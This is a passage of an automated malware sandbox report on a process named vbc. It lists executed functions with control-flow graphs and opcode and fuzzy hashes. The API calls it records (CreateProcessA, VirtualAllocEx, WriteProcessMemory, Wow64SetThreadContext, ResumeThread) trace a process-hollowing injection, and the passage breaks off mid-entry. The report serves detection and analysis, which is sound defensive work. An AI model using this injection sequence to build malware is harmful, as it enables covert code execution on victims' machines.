6674->6675 6677 c008e2 6675->6677 6677->6615 6679 c00864 VirtualAllocEx 6678->6679 6681 c008e2 6679->6681 6681->6615 6683 c00994 WriteProcessMemory 6682->6683 6685 c00a33 6683->6685 6685->6616 6687 c00994 WriteProcessMemory 6686->6687 6689 c00a33 6687->6689 6689->6616 6691 c00739 Wow64SetThreadContext 6690->6691 6693 c007b7 6691->6693 6693->6623 6695 c00739 Wow64SetThreadContext 6694->6695 6697 c007b7 6695->6697 6697->6623 6699 c03082 6698->6699 6708 c00600 6699->6708 6712 c005f9 6699->6712 6700 c030b1 6700->6624 6704 c03082 6703->6704 6706 c00600 ResumeThread 6704->6706 6707 c005f9 ResumeThread 6704->6707 6705 c030b1 6705->6624 6706->6705 6707->6705 6709 c00644 ResumeThread 6708->6709 6711 c00696 6709->6711 6711->6700 6713 c00644 ResumeThread 6712->6713 6715 c00696 6713->6715 6715->6700 6717 c00d67 CreateProcessA 6716->6717 6719 c00fc5 6717->6719 6721 c00d67 CreateProcessA 6720->6721 6723 c00fc5 6721->6723 6725 c00af4 ReadProcessMemory 6724->6725 6727 c00b72 6725->6727 6727->6649 6729 c00af4 ReadProcessMemory 6728->6729 6731 c00b72 6729->6731 6731->6649 6732 c01439 6733 c01275 6732->6733 6734 c0167a 6733->6734 6735 c01ce6 12 API calls 6733->6735 6736 c01c58 12 API calls 6733->6736 6735->6733 6736->6733

                                        Executed Functions

                                        Function 00506CBA Relevance: 2.5, Strings: 2, Instructions: 47COMMON
                                        Download Yara Rule

                                        Control-flow Graph

                                        • Executed
                                        • Not Executed
                                        control_flow_graph 0 506cba-506d33 call 500bc0 6 506d39-506d5d 0->6 7 5070fd-507103 0->7 16 506d63 call 507758 6->16 17 506d63 call 507749 6->17 8 507105 7->8 9 50710c-50711d 7->9 8->8 9->7 10 50711f-50717b 9->10 14 5070f7-5070fa 10->14 13 506d69-506d71 13->14 14->7 16->13 17->13
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000004.00000002.478154814.0000000000500000.00000040.00000800.00020000.00000000.sdmp, Offset: 00500000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_4_2_500000_vbc.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID: ($25V
                                        • API String ID: 0-521514040
                                        • Opcode ID: 4bebaa08ae05a628a65722a1f1ee43cd2c886fa0d9ed3e091b0f0483b3e924c9
                                        • Instruction ID: 13780544b51c448fd98c4b99cbaad3225838bfad650d7ef7d4fb47d19e923645
                                        • Opcode Fuzzy Hash: 4bebaa08ae05a628a65722a1f1ee43cd2c886fa0d9ed3e091b0f0483b3e924c9
                                        • Instruction Fuzzy Hash: 0D217F78A052188FCB64DF68C994BDDBBB1BB4D314F1085E9D40AA7361DA75AE808F40
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 00506E74 Relevance: 2.5, Strings: 2, Instructions: 39COMMON
                                        Download Yara Rule

                                        Control-flow Graph

                                        • Executed
                                        • Not Executed
                                        control_flow_graph 18 506e74-506ed8 22 5070fd-507103 18->22 23 506ede-506ef3 call 507628 18->23 24 507105 22->24 25 50710c-50711d 22->25 29 506ef9-506f13 23->29 24->24 25->22 26 50711f-50717b 25->26 30 5070f7-5070fa 26->30 29->30 30->22
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000004.00000002.478154814.0000000000500000.00000040.00000800.00020000.00000000.sdmp, Offset: 00500000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_4_2_500000_vbc.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID: $#
                                        • API String ID: 0-2491617062
                                        • Opcode ID: 43af220d9b904ae99105ed5bdd41988cefbd6dff77c40761bf00f02c7db7e007
                                        • Instruction ID: 9789dfbb448e6617a735025789d1b31bda36877d1c59598cf959298d45ddb854
                                        • Opcode Fuzzy Hash: 43af220d9b904ae99105ed5bdd41988cefbd6dff77c40761bf00f02c7db7e007
                                        • Instruction Fuzzy Hash: E3117F74E04218CFCB60DF68D8A8BDDBBB1BB0A304F5085E9D409A7240DB31AE81CF90
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 00C00CD4 Relevance: 1.8, APIs: 1, Instructions: 328processCOMMON
                                        Download Yara Rule

                                        Control-flow Graph

                                        • Executed
                                        • Not Executed
                                        control_flow_graph 33 c00cd4-c00d79 35 c00dc2-c00dea 33->35 36 c00d7b-c00d92 33->36 39 c00e30-c00e86 35->39 40 c00dec-c00e00 35->40 36->35 41 c00d94-c00d99 36->41 48 c00e88-c00e9c 39->48 49 c00ecc-c00fc3 CreateProcessA 39->49 40->39 50 c00e02-c00e07 40->50 42 c00d9b-c00da5 41->42 43 c00dbc-c00dbf 41->43 45 c00da7 42->45 46 c00da9-c00db8 42->46 43->35 45->46 46->46 51 c00dba 46->51 48->49 58 c00e9e-c00ea3 48->58 69 c00fc5-c00fcb 49->69 70 c00fcc-c010b1 49->70 52 c00e09-c00e13 50->52 53 c00e2a-c00e2d 50->53 51->43 55 c00e15 52->55 56 c00e17-c00e26 52->56 53->39 55->56 56->56 59 c00e28 56->59 60 c00ea5-c00eaf 58->60 61 c00ec6-c00ec9 58->61 59->53 63 c00eb1 60->63 64 c00eb3-c00ec2 60->64 61->49 63->64 64->64 65 c00ec4 64->65 65->61 69->70 82 c010c1-c010c5 70->82 83 c010b3-c010b7 70->83 84 c010d5-c010d9 82->84 85 c010c7-c010cb 82->85 83->82 86 c010b9 83->86 88 c010e9-c010ed 84->88 89 c010db-c010df 84->89 85->84 87 c010cd 85->87 86->82 87->84 91 c01123-c0112e 88->91 92 c010ef-c01118 88->92 89->88 90 c010e1 89->90 90->88 95 c0112f 91->95 92->91 95->95
                                        APIs
                                        • CreateProcessA.KERNEL32(?,?,?,?,?,?,?,?,?,?), ref: 00C00FA7
                                        Memory Dump Source
                                        • Source File: 00000004.00000002.478472572.0000000000C00000.00000040.00000800.00020000.00000000.sdmp, Offset: 00C00000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_4_2_c00000_vbc.jbxd
                                        Similarity
                                        • API ID: CreateProcess
                                        • String ID:
                                        • API String ID: 963392458-0
                                        • Opcode ID: 20e5244baacccb6cba7d3cda63a9b3a7666a4bad1ae7abf677d843e791eb6cd3
                                        • Instruction ID: 9af18443b3d85d48820af3288abefabedcf847794f88f1d05fef3a8a2afec9be
                                        • Opcode Fuzzy Hash: 20e5244baacccb6cba7d3cda63a9b3a7666a4bad1ae7abf677d843e791eb6cd3
                                        • Instruction Fuzzy Hash: 6EC13470D0425D8FCB20CFA4C841BEEBBB1BF49304F1595A9D959B7280EB709A85CF91
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 00C00CE0 Relevance: 1.8, APIs: 1, Instructions: 323processCOMMON
                                        Download Yara Rule

                                        Control-flow Graph

                                        • Executed
                                        • Not Executed
                                        control_flow_graph 97 c00ce0-c00d79 99 c00dc2-c00dea 97->99 100 c00d7b-c00d92 97->100 103 c00e30-c00e86 99->103 104 c00dec-c00e00 99->104 100->99 105 c00d94-c00d99 100->105 112 c00e88-c00e9c 103->112 113 c00ecc-c00fc3 CreateProcessA 103->113 104->103 114 c00e02-c00e07 104->114 106 c00d9b-c00da5 105->106 107 c00dbc-c00dbf 105->107 109 c00da7 106->109 110 c00da9-c00db8 106->110 107->99 109->110 110->110 115 c00dba 110->115 112->113 122 c00e9e-c00ea3 112->122 133 c00fc5-c00fcb 113->133 134 c00fcc-c010b1 113->134 116 c00e09-c00e13 114->116 117 c00e2a-c00e2d 114->117 115->107 119 c00e15 116->119 120 c00e17-c00e26 116->120 117->103 119->120 120->120 123 c00e28 120->123 124 c00ea5-c00eaf 122->124 125 c00ec6-c00ec9 122->125 123->117 127 c00eb1 124->127 128 c00eb3-c00ec2 124->128 125->113 127->128 128->128 129 c00ec4 128->129 129->125 133->134 146 c010c1-c010c5 134->146 147 c010b3-c010b7 134->147 148 c010d5-c010d9 146->148 149 c010c7-c010cb 146->149 147->146 150 c010b9 147->150 152 c010e9-c010ed 148->152 153 c010db-c010df 148->153 149->148 151 c010cd 149->151 150->146 151->148 155 c01123-c0112e 152->155 156 c010ef-c01118 152->156 153->152 154 c010e1 153->154 154->152 159 c0112f 155->159 156->155 159->159
                                        APIs
                                        • CreateProcessA.KERNEL32(?,?,?,?,?,?,?,?,?,?), ref: 00C00FA7
                                        Memory Dump Source
                                        • Source File: 00000004.00000002.478472572.0000000000C00000.00000040.00000800.00020000.00000000.sdmp, Offset: 00C00000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_4_2_c00000_vbc.jbxd
                                        Similarity
                                        • API ID: CreateProcess
                                        • String ID:
                                        • API String ID: 963392458-0
                                        • Opcode ID: e97be99af881aae322448481a861285271aa77f959c323d6666e0c9b718aa5b2
                                        • Instruction ID: 3e32ca22330088dc5ea31cc2a6910fa4d594cacd0b31387dc93584ce5a6d8b5d
                                        • Opcode Fuzzy Hash: e97be99af881aae322448481a861285271aa77f959c323d6666e0c9b718aa5b2
                                        • Instruction Fuzzy Hash: 2CC13470D0425D8FCB20CFA4C841BEEBBB1BF49308F1595A9D959B7280EB709A85CF91
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 00C00940 Relevance: 1.6, APIs: 1, Instructions: 121injectionCOMMON
                                        Download Yara Rule

                                        Control-flow Graph

                                        • Executed
                                        • Not Executed
                                        control_flow_graph 161 c00940-c009b3 163 c009b5-c009c7 161->163 164 c009ca-c00a31 WriteProcessMemory 161->164 163->164 166 c00a33-c00a39 164->166 167 c00a3a-c00a8c 164->167 166->167
                                        APIs
                                        • WriteProcessMemory.KERNELBASE(?,?,?,?,?), ref: 00C00A1B
                                        Memory Dump Source
                                        • Source File: 00000004.00000002.478472572.0000000000C00000.00000040.00000800.00020000.00000000.sdmp, Offset: 00C00000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_4_2_c00000_vbc.jbxd
                                        Similarity
                                        • API ID: MemoryProcessWrite
                                        • String ID:
                                        • API String ID: 3559483778-0
                                        • Opcode ID: 0a81c37a467713a45608fdcf16a91b072e7c961ab898094008aeba48aea8c396
                                        • Instruction ID: b5aaa4e413ee83ae654ac881a2bf5df662e1d474d8a00417da7c26cfd73c5969
                                        • Opcode Fuzzy Hash: 0a81c37a467713a45608fdcf16a91b072e7c961ab898094008aeba48aea8c396
                                        • Instruction Fuzzy Hash: 0041A9B5D012589FCF00CFA9D984AEEBBB1FB49304F24942AE818B7250D735AA55CF64
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 00C00948 Relevance: 1.6, APIs: 1, Instructions: 118injectionCOMMON
                                        Download Yara Rule

                                        Control-flow Graph

                                        • Executed
                                        • Not Executed
                                        control_flow_graph 172 c00948-c009b3 174 c009b5-c009c7 172->174 175 c009ca-c00a31 WriteProcessMemory 172->175 174->175 177 c00a33-c00a39 175->177 178 c00a3a-c00a8c 175->178 177->178
                                        APIs
                                        • WriteProcessMemory.KERNELBASE(?,?,?,?,?), ref: 00C00A1B
                                        Memory Dump Source
                                        • Source File: 00000004.00000002.478472572.0000000000C00000.00000040.00000800.00020000.00000000.sdmp, Offset: 00C00000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_4_2_c00000_vbc.jbxd
                                        Similarity
                                        • API ID: MemoryProcessWrite
                                        • String ID:
                                        • API String ID: 3559483778-0
                                        • Opcode ID: 10997d75f27cc0acf0a10041c41af8ddbb1c820ab371260b3fd8c17ad4723f50
                                        • Instruction ID: 7a3e45de214a7f764dd170b43f2a470ae567671e12c87a1033f96b03e7597d6e
                                        • Opcode Fuzzy Hash: 10997d75f27cc0acf0a10041c41af8ddbb1c820ab371260b3fd8c17ad4723f50
                                        • Instruction Fuzzy Hash: 0C4199B5D012589FCF00CFA9D984AEEFBB1FB49314F20942AE818B7250D735AA55CF64
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 00C00AA1 Relevance: 1.6, APIs: 1, Instructions: 110COMMON
                                        Download Yara Rule

                                        Control-flow Graph

                                        • Executed
                                        • Not Executed
                                        control_flow_graph 183 c00aa1-c00b70 ReadProcessMemory 186 c00b72-c00b78 183->186 187 c00b79-c00bcb 183->187 186->187
                                        APIs
                                        • ReadProcessMemory.KERNELBASE(?,?,?,?,?), ref: 00C00B5A
                                        Memory Dump Source
                                        • Source File: 00000004.00000002.478472572.0000000000C00000.00000040.00000800.00020000.00000000.sdmp, Offset: 00C00000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_4_2_c00000_vbc.jbxd
                                        Similarity
                                        • API ID: MemoryProcessRead
                                        • String ID:
                                        • API String ID: 1726664587-0
                                        • Opcode ID: 5f242cfc5cc9f9498a3245ecdf37ce8539d420a4cc08d4f2a874f9e6611dfa57
                                        • Instruction ID: 0d82654266656edd6296a0b7e935a238943cdbea75496679089631a3d399d5f4
                                        • Opcode Fuzzy Hash: 5f242cfc5cc9f9498a3245ecdf37ce8539d420a4cc08d4f2a874f9e6611dfa57
                                        • Instruction Fuzzy Hash: DB41ABB5D04258DFCF00CFA9D884AEEFBB1BB49314F20942AE914B7250D735AA55CF64
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 00C00AA8 Relevance: 1.6, APIs: 1, Instructions: 108COMMON
                                        Download Yara Rule

                                        Control-flow Graph

                                        • Executed
                                        • Not Executed
                                        control_flow_graph 192 c00aa8-c00b70 ReadProcessMemory 195 c00b72-c00b78 192->195 196 c00b79-c00bcb 192->196 195->196
                                        APIs
                                        • ReadProcessMemory.KERNELBASE(?,?,?,?,?), ref: 00C00B5A
                                        Memory Dump Source
                                        • Source File: 00000004.00000002.478472572.0000000000C00000.00000040.00000800.00020000.00000000.sdmp, Offset: 00C00000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_4_2_c00000_vbc.jbxd
                                        Similarity
                                        • API ID: MemoryProcessRead
                                        • String ID:
                                        • API String ID: 1726664587-0
                                        • Opcode ID: a2721d2d786814800ada94868e3e8920f19244b15cf7f826e2d7ad4475415166
                                        • Instruction ID: d377390e92468b7070a4757fe3fe955c14f6f926d513308d94146da3b1ece89e
                                        • Opcode Fuzzy Hash: a2721d2d786814800ada94868e3e8920f19244b15cf7f826e2d7ad4475415166
                                        • Instruction Fuzzy Hash: 8F41AAB4D042589FCF00CFA9D884AEEFBB1BB49314F20942AE814B7240D735AA55CFA4
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 00C00819 Relevance: 1.6, APIs: 1, Instructions: 105memoryCOMMON
                                        Download Yara Rule

                                        Control-flow Graph

                                        • Executed
                                        • Not Executed
                                        control_flow_graph 201 c00819-c008e0 VirtualAllocEx 204 c008e2-c008e8 201->204 205 c008e9-c00933 201->205 204->205
                                        APIs
                                        • VirtualAllocEx.KERNELBASE(?,?,?,?,?), ref: 00C008CA
                                        Memory Dump Source
                                        • Source File: 00000004.00000002.478472572.0000000000C00000.00000040.00000800.00020000.00000000.sdmp, Offset: 00C00000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_4_2_c00000_vbc.jbxd
                                        Similarity
                                        • API ID: AllocVirtual
                                        • String ID:
                                        • API String ID: 4275171209-0
                                        • Opcode ID: b899088d464d2329dbaac334800b1b2095c80798fcac9a223cbfa0ec9adcc09b
                                        • Instruction ID: 84cbdea25ff95ebf11889280b2afc96436bd2262d3a357dd3f5b55e7adc1f8f7
                                        • Opcode Fuzzy Hash: b899088d464d2329dbaac334800b1b2095c80798fcac9a223cbfa0ec9adcc09b
                                        • Instruction Fuzzy Hash: 6C418AB8D002589FCF10CFA9D984ADEBBB1FB49310F20A41AE915B7350D735A915CFA5
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 00C00820 Relevance: 1.6, APIs: 1, Instructions: 103memoryCOMMON
                                        Download Yara Rule

                                        Control-flow Graph

                                        • Executed
                                        • Not Executed
                                        control_flow_graph 210 c00820-c008e0 VirtualAllocEx 213 c008e2-c008e8 210->213 214 c008e9-c00933 210->214 213->214
                                        APIs
                                        • VirtualAllocEx.KERNELBASE(?,?,?,?,?), ref: 00C008CA
                                        Memory Dump Source
                                        • Source File: 00000004.00000002.478472572.0000000000C00000.00000040.00000800.00020000.00000000.sdmp, Offset: 00C00000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_4_2_c00000_vbc.jbxd
                                        Similarity
                                        • API ID: AllocVirtual
                                        • String ID:
                                        • API String ID: 4275171209-0
                                        • Opcode ID: b5fd8cefe4e05c2228534cdc1607ca85114fa6525ccbf5bcf7994884fe2d9140
                                        • Instruction ID: 62c8f9b63a2b3e9c10dc98cc605bd2bdf2e7c2730011d2917bf88c3807a1588b
                                        • Opcode Fuzzy Hash: b5fd8cefe4e05c2228534cdc1607ca85114fa6525ccbf5bcf7994884fe2d9140
                                        • Instruction Fuzzy Hash: C74188B8D042589BCF10CFA9D884A9EBBB1FB49310F20A42AE915B7250D735A916CF95
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 00C006E9 Relevance: 1.6, APIs: 1, Instructions: 98threadCOMMON
                                        Download Yara Rule

                                        Control-flow Graph

                                        • Executed
                                        • Not Executed
                                        control_flow_graph 219 c006e9-c00750 221 c00752-c00764 219->221 222 c00767-c007b5 Wow64SetThreadContext 219->222 221->222 224 c007b7-c007bd 222->224 225 c007be-c0080a 222->225 224->225
                                        APIs
                                        • Wow64SetThreadContext.KERNEL32(?,?), ref: 00C0079F
                                        Memory Dump Source
                                        • Source File: 00000004.00000002.478472572.0000000000C00000.00000040.00000800.00020000.00000000.sdmp, Offset: 00C00000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_4_2_c00000_vbc.jbxd
                                        Similarity
                                        • API ID: ContextThreadWow64
                                        • String ID:
                                        • API String ID: 983334009-0
                                        • Opcode ID: 859c24c3b182862466edc00d29a8d8c620995bc4e96fdf6c55fc20d2c20ed14d
                                        • Instruction ID: c8fbfd7630721116486a7e82e138c0130ab8588950bae8cb90f8431862ce0466
                                        • Opcode Fuzzy Hash: 859c24c3b182862466edc00d29a8d8c620995bc4e96fdf6c55fc20d2c20ed14d
                                        • Instruction Fuzzy Hash: 0B41ACB4D00258DFCB10CFA9D984AEEFBB1BF49314F24842AE419B7250D779AA46CF54
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 00C006F0 Relevance: 1.6, APIs: 1, Instructions: 96threadCOMMON
                                        Download Yara Rule

                                        Control-flow Graph

                                        • Executed
                                        • Not Executed
                                        control_flow_graph 230 c006f0-c00750 232 c00752-c00764 230->232 233 c00767-c007b5 Wow64SetThreadContext 230->233 232->233 235 c007b7-c007bd 233->235 236 c007be-c0080a 233->236 235->236
                                        APIs
                                        • Wow64SetThreadContext.KERNEL32(?,?), ref: 00C0079F
                                        Memory Dump Source
                                        • Source File: 00000004.00000002.478472572.0000000000C00000.00000040.00000800.00020000.00000000.sdmp, Offset: 00C00000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_4_2_c00000_vbc.jbxd
                                        Similarity
                                        • API ID: ContextThreadWow64
                                        • String ID:
                                        • API String ID: 983334009-0
                                        • Opcode ID: 7d65e119bd98be20c2166c5a1b676f22eb857745b6679e04a9cfad9ddc4ca864
                                        • Instruction ID: 7b026706453e592d6fa0a4b6f131a23cd8ba65b941299b529d519f2696ab624c
                                        • Opcode Fuzzy Hash: 7d65e119bd98be20c2166c5a1b676f22eb857745b6679e04a9cfad9ddc4ca864
                                        • Instruction Fuzzy Hash: 0D41ABB4D002589FCB10CFA9D884AEEFBB1BF49314F24842AE818B7240D779AA45CF54
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 00C005F9 Relevance: 1.6, APIs: 1, Instructions: 77threadCOMMON
                                        Download Yara Rule

                                        Control-flow Graph

                                        • Executed
                                        • Not Executed
                                        control_flow_graph 241 c005f9-c00694 ResumeThread 244 c00696-c0069c 241->244 245 c0069d-c006df 241->245 244->245
                                        APIs
                                        • ResumeThread.KERNELBASE(?), ref: 00C0067E
                                        Memory Dump Source
                                        • Source File: 00000004.00000002.478472572.0000000000C00000.00000040.00000800.00020000.00000000.sdmp, Offset: 00C00000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_4_2_c00000_vbc.jbxd
                                        Similarity
                                        • API ID: ResumeThread
                                        • String ID:
                                        • API String ID: 947044025-0
                                        • Opcode ID: 9598f9ac0850e7d2de144e06cd82978cf15bb41857636cc8564eee67d601b974
                                        • Instruction ID: 73ed1f370fcfad51d61bf512ba1d5f190e7227b2e11af732cb8307c1519a118d
                                        • Opcode Fuzzy Hash: 9598f9ac0850e7d2de144e06cd82978cf15bb41857636cc8564eee67d601b974
                                        • Instruction Fuzzy Hash: C131AAB4D012589FCB10CFA9D884A9EFBB1FF89314F24942AE819B7350D735A915CF94
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 00C00600 Relevance: 1.6, APIs: 1, Instructions: 75threadCOMMON
                                        Download Yara Rule

                                        Control-flow Graph

                                        • Executed
                                        • Not Executed
                                        control_flow_graph 250 c00600-c00694 ResumeThread 253 c00696-c0069c 250->253 254 c0069d-c006df 250->254 253->254
                                        APIs
                                        • ResumeThread.KERNELBASE(?), ref: 00C0067E
                                        Memory Dump Source
                                        • Source File: 00000004.00000002.478472572.0000000000C00000.00000040.00000800.00020000.00000000.sdmp, Offset: 00C00000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_4_2_c00000_vbc.jbxd
                                        Similarity
                                        • API ID: ResumeThread
                                        • String ID:
                                        • API String ID: 947044025-0
                                        • Opcode ID: 30f7ec008851da0c055069501554114591c23081be7045f325089117adbf4878
                                        • Instruction ID: 35700ead98b10bd6f5b1d35ef8d8ffbf324625073f15ba5996ae9de2b9f789bf
                                        • Opcode Fuzzy Hash: 30f7ec008851da0c055069501554114591c23081be7045f325089117adbf4878
                                        • Instruction Fuzzy Hash: DF31A9B4D012589BCF10CFA9D884AAEFBB5EB89314F20942AE818B7340D735A905CF94
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 00506DB6 Relevance: 1.3, Strings: 1, Instructions: 51COMMON
                                        Download Yara Rule
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000004.00000002.478154814.0000000000500000.00000040.00000800.00020000.00000000.sdmp, Offset: 00500000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_4_2_500000_vbc.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID: )
                                        • API String ID: 0-2427484129
                                        • Opcode ID: d9ea283cf924636a729188b77bd1f454f723040bf6697c89a326e25060cd6180
                                        • Instruction ID: 52aa23685ce4a55f35e7bd0ac087b8eb7bbd5d57f5b46add96f069370adda5e8
                                        • Opcode Fuzzy Hash: d9ea283cf924636a729188b77bd1f454f723040bf6697c89a326e25060cd6180
                                        • Instruction Fuzzy Hash: C9210334E052098FCB50DFA8D595AEDBBB2AF49304F2085A9D409B7290EB35AE85CF50
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 005005C0 Relevance: .2, Instructions: 195COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 00000004.00000002.478154814.0000000000500000.00000040.00000800.00020000.00000000.sdmp, Offset: 00500000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_4_2_500000_vbc.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 6a0dd580b492c1725f698c7536e90484faeed3a12288d36183a3ffc74665653a
                                        • Instruction ID: 488791a1427474cd917248600c53823da0175d30c04d8c736945c3955d4599e0
                                        • Opcode Fuzzy Hash: 6a0dd580b492c1725f698c7536e90484faeed3a12288d36183a3ffc74665653a
                                        • Instruction Fuzzy Hash: 62810474D042089FDB00DFA4E984BEEBBB2FF88304F209529D505AB39ADB745946CF91
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 005005D0 Relevance: .2, Instructions: 191COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 00000004.00000002.478154814.0000000000500000.00000040.00000800.00020000.00000000.sdmp, Offset: 00500000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_4_2_500000_vbc.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 3c678d95b4ebdf99e6e5451fa49498a087fb3c706341198c91db268e0918af31
                                        • Instruction ID: d34516b13be8a0a037472f98631e7ccbd3c4b373d03fe71b59ea8151c8d52194
                                        • Opcode Fuzzy Hash: 3c678d95b4ebdf99e6e5451fa49498a087fb3c706341198c91db268e0918af31
                                        • Instruction Fuzzy Hash: 4481E374E042089FDB40DFA4D988BEDBBB2FF88304F209529D509BB299DB745946CF91
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 00507EF2 Relevance: .1, Instructions: 112COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 00000004.00000002.478154814.0000000000500000.00000040.00000800.00020000.00000000.sdmp, Offset: 00500000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_4_2_500000_vbc.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 3d2b42427a248621fa4897604db02593c6b0c9eebd2ffa931871b2de952b811c
                                        • Instruction ID: 002683e6816da1b398188e07402764127b78cf8d5e4788476d936a476e1137f6
                                        • Opcode Fuzzy Hash: 3d2b42427a248621fa4897604db02593c6b0c9eebd2ffa931871b2de952b811c
                                        • Instruction Fuzzy Hash: ED41AF31E0811E9FDB04DBA4D954BFEBBB6BFC8310F118465E915BB281EB306D059B91
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 00507F00 Relevance: .1, Instructions: 110COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 00000004.00000002.478154814.0000000000500000.00000040.00000800.00020000.00000000.sdmp, Offset: 00500000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_4_2_500000_vbc.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 952bd84ad1b0cec8b02d56fa29498be682f846d13123e0296a0d2a57214aad78
                                        • Instruction ID: 979e591eaf7f315de5e5d912820a023dd5c8c820a56e5915a3345c4b08c898e6
                                        • Opcode Fuzzy Hash: 952bd84ad1b0cec8b02d56fa29498be682f846d13123e0296a0d2a57214aad78
                                        • Instruction Fuzzy Hash: AD319E31E1811E9BDB14DBA4D944BBEBBB6BBC8310F118465E916B72C0EB306D059B91
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 00509874 Relevance: .1, Instructions: 85COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 00000004.00000002.478154814.0000000000500000.00000040.00000800.00020000.00000000.sdmp, Offset: 00500000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_4_2_500000_vbc.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 13e8a48463105791474b1c6e639ec7276161e2097346072b321f1ed36dadab14
                                        • Instruction ID: efa0862b952f975b743e1c4f5d9812f0ffb48522c862897fcdf9fe5049a5e54a
                                        • Opcode Fuzzy Hash: 13e8a48463105791474b1c6e639ec7276161e2097346072b321f1ed36dadab14
                                        • Instruction Fuzzy Hash: DD41E770910249CFDB50EFA8E888AACBBF1FB09311F568169D505AB366DF719C41CF51
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 0050815C Relevance: .1, Instructions: 83COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 00000004.00000002.478154814.0000000000500000.00000040.00000800.00020000.00000000.sdmp, Offset: 00500000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_4_2_500000_vbc.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: f78ad0284f1c963f243eb30224c2c609f9bea0fcebdb93bec1f9394be87a98ec
                                        • Instruction ID: 478774bb4b6e0886fe26da29ded9e9a45111daeb1a9a27e226f14604a683a6e6
                                        • Opcode Fuzzy Hash: f78ad0284f1c963f243eb30224c2c609f9bea0fcebdb93bec1f9394be87a98ec
                                        • Instruction Fuzzy Hash: 1331A430E08A56CFCB00DB64C944FBEBFA1BF54310F1944A5D9899B282DE34DC46C792
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 00507A70 Relevance: .1, Instructions: 81COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 00000004.00000002.478154814.0000000000500000.00000040.00000800.00020000.00000000.sdmp, Offset: 00500000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_4_2_500000_vbc.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 328a63eaeffa07f3b90487c95762503a5e8514fe73e24b2a9e17066e6d4159ba
                                        • Instruction ID: 9783199e478fd62985f44b351ff366b7f5e8aaa8c475a125fd2e91b47f282c1a
                                        • Opcode Fuzzy Hash: 328a63eaeffa07f3b90487c95762503a5e8514fe73e24b2a9e17066e6d4159ba
